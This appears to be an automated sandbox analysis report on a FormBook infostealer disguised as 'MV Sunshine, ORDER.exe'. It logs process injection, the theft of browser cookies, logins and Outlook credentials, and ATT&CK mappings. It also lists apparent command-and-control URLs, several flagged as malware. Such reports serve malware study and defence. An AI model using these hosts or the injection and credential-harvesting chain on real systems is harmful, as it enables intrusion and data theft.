Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\clip.exe

Thread register set: target process: 7868

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\clip.exe

Thread APC queued: target process: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2FF1008

Jump to behavior

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009D8C93 LogonUserW,

0_2_009D8C93

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_00983B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00983B4C

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_00984A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00984A35

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009E4EC9 mouse_event,

0_2_009E4EC9

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\MV Sunshine, ORDER.exe"	Jump to behavior
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

0_2_009D81F7

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009E4C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_009E4C03

Source: MV Sunshine, ORDER.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: MV Sunshine, ORDER.exe, QAjjirwAoAEExvw.exe, 00000002.00000002.4133436886.0000000001431000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000000.1798122707.0000000001430000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4133623639.0000000001861000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: QAjjirwAoAEExvw.exe, 00000002.00000002.4133436886.0000000001431000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000000.1798122707.0000000001430000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4133623639.0000000001861000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: QAjjirwAoAEExvw.exe, 00000002.00000002.4133436886.0000000001431000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000000.1798122707.0000000001430000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4133623639.0000000001861000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: QAjjirwAoAEExvw.exe, 00000002.00000002.4133436886.0000000001431000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000002.00000000.1798122707.0000000001430000.00000002.00000001.00040000.00000000.sdmp, QAjjirwAoAEExvw.exe, 00000007.00000002.4133623639.0000000001861000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009A886B cpuid

0_2_009A886B

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009B50D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_009B50D7

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009C2230 GetUserNameW,

0_2_009C2230

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009B418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_009B418A

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_00984AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00984AFE

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\clip.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: MV Sunshine, ORDER.exe	Binary or memory string: WIN_81
Source: MV Sunshine, ORDER.exe	Binary or memory string: WIN_XP
Source: MV Sunshine, ORDER.exe	Binary or memory string: WIN_XPe
Source: MV Sunshine, ORDER.exe	Binary or memory string: WIN_VISTA
Source: MV Sunshine, ORDER.exe	Binary or memory string: WIN_7
Source: MV Sunshine, ORDER.exe	Binary or memory string: WIN_8
Source: MV Sunshine, ORDER.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1873780514.00000000037C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1873248495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4132527853.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1874589714.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4134086623.0000000004560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4133910746.0000000002B10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4133953965.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009F6596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_009F6596
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009F6A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_009F6A5A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	2 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MV Sunshine, ORDER.exe	37%	ReversingLabs	Win32.Trojan.Strab
MV Sunshine, ORDER.exe	31%	Virustotal		Browse
MV Sunshine, ORDER.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.sandranoll.com	11%	Virustotal	Browse
www.dmtxwuatbz.cc	2%	Virustotal	Browse
www.xn--matfrmn-jxa4m.se	0%	Virustotal	Browse
www.catherineviskadi.com	1%	Virustotal	Browse
www.anuts.top	7%	Virustotal	Browse
www.bfiworkerscomp.com	0%	Virustotal	Browse
www.helpers-lion.online	0%	Virustotal	Browse
www.xn--fhq1c541j0zr.com	0%	Virustotal	Browse
parkingpage.namecheap.com	0%	Virustotal	Browse
www.hprlz.cz	1%	Virustotal	Browse
www.gipsytroya.com	1%	Virustotal	Browse
www.hatercoin.online	2%	Virustotal	Browse
www.telwisey.info	2%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://www.bfiworkerscomp.com/xzzi/?ZH3=yf1H3v6h&YXDT=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4=	0%	Avira URL Cloud	safe
https://dts.gnpge.com	0%	Avira URL Cloud	safe
https://reg.ru	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://reg.ru	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://www.xn--matfrmn-jxa4m.se/4hda/?YXDT=+FYRabRorC7iiipdZ2F3S2JpD5gx1+4XHVGGEQvE/CSzp7OmTlR57ws6ggMdmmjgEK74RwiZfuW5KkdpyqG9+fjZ9jEj5Dze7n0KBNuQ8eKVrjet+eDbX/8=&ZH3=yf1H3v6h	100%	Avira URL Cloud	malware
https://www.reg.ru/whois/?check=&dname=www.helpers-lion.online&reg_source=parking_auto	0%	Virustotal		Browse
http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=RVFsMXVZQ01zWVBtemVpNk84WGZGRFNKclVyQWVYYVJiaVZY	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	0%	Avira URL Cloud	safe
https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&	0%	Avira URL Cloud	safe
http://www.xn--fhq1c541j0zr.com/rm91/	0%	Avira URL Cloud	safe
http://www.bfiworkerscomp.com/xzzi/	0%	Avira URL Cloud	safe
https://dts.gnpge.com	0%	Virustotal		Browse
http://www.gipsytroya.com/tf44/?YXDT=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&ZH3=yf1H3v6h	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
https://www.reg.ru/web-sites/website-builder/?utm_source=www.helpers-lion.online&utm_medium=parking&	0%	Virustotal		Browse
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	0%	Avira URL Cloud	safe
http://www.bfiworkerscomp.com/xzzi/	0%	Virustotal		Browse
https://static.loopia.se/responsive/images/iOS-72.png	0%	Virustotal		Browse
http://www.xn--fhq1c541j0zr.com/rm91/	0%	Virustotal		Browse
http://www.telwisey.info/ei85/?YXDT=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&ZH3=yf1H3v6h	0%	Avira URL Cloud	safe
https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_	0%	Avira URL Cloud	safe
http://www.bfiworkerscomp.com/px.js?ch=2	0%	Avira URL Cloud	safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	1%	Virustotal		Browse
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	0%	Virustotal		Browse
https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	0%	Virustotal		Browse
http://www.bfiworkerscomp.com/px.js?ch=1	0%	Avira URL Cloud	safe
https://www.reg.ru/domain/new/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_	0%	Virustotal		Browse
https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
https://parking.reg.ru/script/get_domain_data?domain_name=www.helpers-lion.online&rand=	0%	Virustotal		Browse
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH	0%	Avira URL Cloud	safe
http://www.dmtxwuatbz.cc/lfkn/	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	1%	Virustotal		Browse
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	1%	Virustotal		Browse
http://www.xn--fhq1c541j0zr.com/rm91/?ZH3=yf1H3v6h&YXDT=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU=	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Virustotal		Browse
http://www.sandranoll.com/aroo/	100%	Avira URL Cloud	malware
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe
http://www.gipsytroya.com/tf44/	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png	0%	Avira URL Cloud	safe
http://www.xn--matfrmn-jxa4m.se/4hda/	100%	Avira URL Cloud	malware
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
http://www.telwisey.info/ei85/	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.sandranoll.com/aroo/?ZH3=yf1H3v6h&YXDT=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=	100%	Avira URL Cloud	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
https://www.reg.ru/hosting/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_lan	0%	Avira URL Cloud	safe
http://www.catherineviskadi.com/qe66/?YXDT=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&ZH3=yf1H3v6h	0%	Avira URL Cloud	safe
http://www.dmtxwuatbz.cc/lfkn/?YXDT=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&ZH3=yf1H3v6h	0%	Avira URL Cloud	safe
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut	0%	Avira URL Cloud	safe
https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-	0%	Avira URL Cloud	safe
http://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=	0%	Avira URL Cloud	safe
https://www.reg.ru/web-sites/?utm_source=www.helpers-lion.online&utm_medium=parking&utm_campaign=s_l	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/styles/reset.css	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-57.png	0%	Avira URL Cloud	safe
http://www.anuts.top/li0t/?ZH3=yf1H3v6h&YXDT=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg=	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/icons/control_panel_icon.gif	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/contao.png	0%	Avira URL Cloud	safe
